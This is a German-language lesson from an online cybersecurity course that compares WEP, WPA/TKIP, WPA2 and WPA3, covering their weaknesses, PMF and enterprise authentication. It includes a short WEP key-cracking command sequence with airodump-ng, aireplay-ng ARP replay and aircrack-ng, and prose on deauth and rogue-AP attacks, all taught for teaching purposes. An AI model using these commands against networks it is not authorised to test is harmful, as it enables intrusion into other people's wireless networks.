802.11-Sicherheitsprotokolle: WEP, WPA2 und WPA3
Verstehen Sie, warum WEP unsicher war, wie WPA2 CCMP funktioniert und welche Verbesserungen WPA3 SAE bietet.
802.11-Sicherheitsprotokolle: WEP, WPA2 und WPA3 ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 1 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Entwicklung der WLAN-Sicherheit
Die Sicherheit drahtloser Netzwerke hat sich vom unsicheren WEP über WPA/WPA2 zum modernen WPA3 entwickelt. Wenn Sie jede Generation verstehen, erkennen Sie, warum die jeweiligen Schwachstellen existierten und wie die Nachfolger sie behoben haben.
WEP: Grundlegend unsicher
WEP (Wired Equivalent Privacy) verwendete RC4 mit einem statischen 40-Bit-Schlüssel und einem schwachen 24-Bit-IV. Nach etwa 5000 Paketen wiederholen sich IVs, wodurch sich der Schlüssel mithilfe statistischer Analysen innerhalb weniger Minuten rekonstruieren lässt. WEP ist vollständig unsicher und darf niemals verwendet werden.
# WEP crack (for authorized lab use only)
# Capture IVs with airodump-ng
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Force IV generation via ARP replay
aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0mon
# Crack the key
aircrack-ng capture-01.capWPA/TKIP: Übergangslösung
WPA mit TKIP (Temporal Key Integrity Protocol) war ein Software-Upgrade für WEP-Hardware. Es verwendete Schlüssel pro Paket und MIC (Michael) zur Sicherstellung der Integrität. TKIP ist weiterhin veraltet und anfällig für praktische Angriffe.
WPA2: CCMP und AES
WPA2 ersetzte RC4 und TKIP durch AES-CCMP, ein korrektes Verfahren für authentifizierte Verschlüsselung. WPA2-Personal verwendet einen Pre-Shared Key (PSK); WPA2-Enterprise verwendet 802.1X/EAP mit einem RADIUS-Server zur benutzerbezogenen Authentifizierung.
# WPA2 security properties:
# - AES-128 in CCMP mode
# - 128-bit session keys per association
# - 4-way handshake establishes PTK (Pairwise Transient Key)
# - PSK mode: shared password → PMK → PTK
# - Enterprise: EAP auth → per-user PMKSchwachstellen von WPA2
WPA2-Personal ist anfällig für Offline-Wörterbuchangriffe auf abgefangene 4-Wege-Handshakes, PMKID-Angriffe (ohne erforderlichen Client) und KRACK (Schlüssel-Neuinstallation, inzwischen gepatcht). Der Pre-Shared Key ist das schwächste Glied.
WPA3: SAE-Handshake
WPA3 ersetzt PSK durch SAE (Simultaneous Authentication of Equals), einen auf Diffie-Hellman basierenden Handshake, der Forward Secrecy und Schutz vor Offline-Wörterbuchangriffen bietet, selbst wenn jemand den Handshake abfängt.
# WPA3-Personal (SAE) benefits:
# - Forward secrecy: past traffic safe if key leaked
# - Offline dictionary attack resistance
# - Equal peers: mutual authentication
# WPA3-Enterprise:
# - 192-bit security suite
# - Mandatory PMF (Protected Management Frames)Schutz von Management-Frames (PMF)
PMF (Protected Management Frames / 802.11w) schützt Deauthentifizierungs- und Dissoziations-Frames vor Spoofing. Für WPA3 ist PMF erforderlich, für WPA2 optional. Ohne PMF sind Evil-Twin- und Deauth-DoS-Angriffe trivial.
Zusammenfassungstabelle: WPA2 im Vergleich zu WPA3
Die wichtigsten Unterschiede zwischen den Protokollen im praktischen Sicherheitskontext.
# Protocol comparison:
# WEP: RC4, broken, never use
# WPA: TKIP, deprecated, avoid
# WPA2: AES-CCMP, secure if strong PSK + enterprise
# WPA3: SAE, forward secrecy, best current standard
# Transition mode: WPA2/WPA3 mixed for compatibilitySicherheitsmodus eines AP prüfen
Ermitteln Sie vor dem Testen, welches Sicherheitsprotokoll ein AP verwendet. Sowohl Airodump-ng als auch Wireshark zeigen die Cipher-Suite in Beacon-Frames an.
# Airodump-ng shows encryption column:
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
# ENCRYPTION column:
# OPN = open (no security)
# WEP = WEP
# WPA2 = WPA2 (check CIPHER for CCMP vs TKIP)
# WPA3 = WPA3 SAESicherheit in Enterprise-WLANs
WPA2/WPA3-Enterprise mit EAP-TLS (zertifikatsbasiert) ist die sicherste Konfiguration. Jeder Benutzer verfügt über ein eigenes Zertifikat – es gibt kein gemeinsames Geheimnis, das per Wörterbuchangriff angegriffen werden kann.
Rogue-AP- und Deauth-Angriffe
Ohne PMF kann ein Angreifer: gefälschte Deauth-Frames senden, um Clients zu trennen, anschließend beim erneuten Verbindungsaufbau den WPA2-Handshake mitschneiden oder die Clients zu einem Rogue AP mit derselben SSID wie das legitime Netzwerk locken.
Kurztest
Welche wichtige Sicherheitsverbesserung bietet WPA3 SAE gegenüber WPA2-PSK?
Zusammenfassung: WLAN-Sicherheitsprotokolle
WEP ist unwiederbringlich gebrochen, WPA/TKIP ist veraltet, WPA2-AES ist in Verbindung mit starken PSKs und Enterprise-Authentifizierung sicher, und WPA3-SAE ist derzeit der beste Standard. Aktivieren Sie PMF in allen WPA2-Netzwerken. Bevorzugen Sie in Unternehmensumgebungen WPA2/WPA3-Enterprise mit EAP-TLS.
Lerne Cyber Security Academy mit einem KI-Tutor — kostenlos
Schreibe und führe echten Code in deinem Browser aus, bekomme sofortige Hilfe von einem 24/7 KI-Tutor und setze dein Lernen im Web oder in der App fort.
- Kurse
- 76
- Lektionen
- 303
Häufig gestellte Fragen
Ist die Lektion „802.11-Sicherheitsprotokolle: WEP, WPA2 und WPA3“ kostenlos?
Ja — der vollständige Text von „802.11-Sicherheitsprotokolle: WEP, WPA2 und WPA3“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Was lerne ich in „802.11-Sicherheitsprotokolle: WEP, WPA2 und WPA3“?
Verstehen Sie, warum WEP unsicher war, wie WPA2 CCMP funktioniert und welche Verbesserungen WPA3 SAE bietet. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.
Brauche ich Erfahrung, um Cyber Security Academy zu starten?
Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 1 von 4.
Wie lange dauert die Lektion „802.11-Sicherheitsprotokolle: WEP, WPA2 und WPA3“?
Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.
Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?
Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.
Alle Lektionen in diesem Kurs
- 802.11-Sicherheitsprotokolle: WEP, WPA2 und WPA3
- WPA2-Handshake erfassen und knacken
- Evil-Twin- und Captive-Portal-Angriffe
- Unternehmens-WLAN: EAP und RADIUS